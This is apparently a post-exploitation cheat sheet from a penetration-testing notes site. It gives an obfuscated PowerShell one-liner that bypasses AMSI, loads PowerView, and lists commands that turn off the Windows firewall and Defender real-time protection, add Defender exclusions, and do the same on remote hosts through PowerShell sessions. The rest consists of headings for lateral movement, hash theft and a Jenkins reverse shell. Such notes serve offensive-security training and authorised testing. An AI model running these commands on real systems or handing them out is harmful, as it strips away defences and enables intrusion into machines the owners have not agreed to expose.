New Server
Bypass AMSI:
powershell -ep bypass
SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
. .\PowerView.ps1
Get-NetUserDisable Firewall
#check status of Microsoft Defender
Get-MpComputerStatus
#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
#Disable Antivirus
Set-MpPreference -DisableRealtimeMonitoring $true
#Exclude file type
Set-MpPreference -ExclusionExtension EXTENSION
#Exclude locations
Set-MpPreference -ExclusionPath PATH\TO\FOLDER
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
#How to delete active threat on Microsoft Defender
Remove-MpThreatDownloading scripts
Enumerate user
access to other servers? for remote command via powershell
Process running
Get Hashes and move Lateral
Jenkins Revershell
priv sca
Downloading scripts
Last updated
Was this helpful?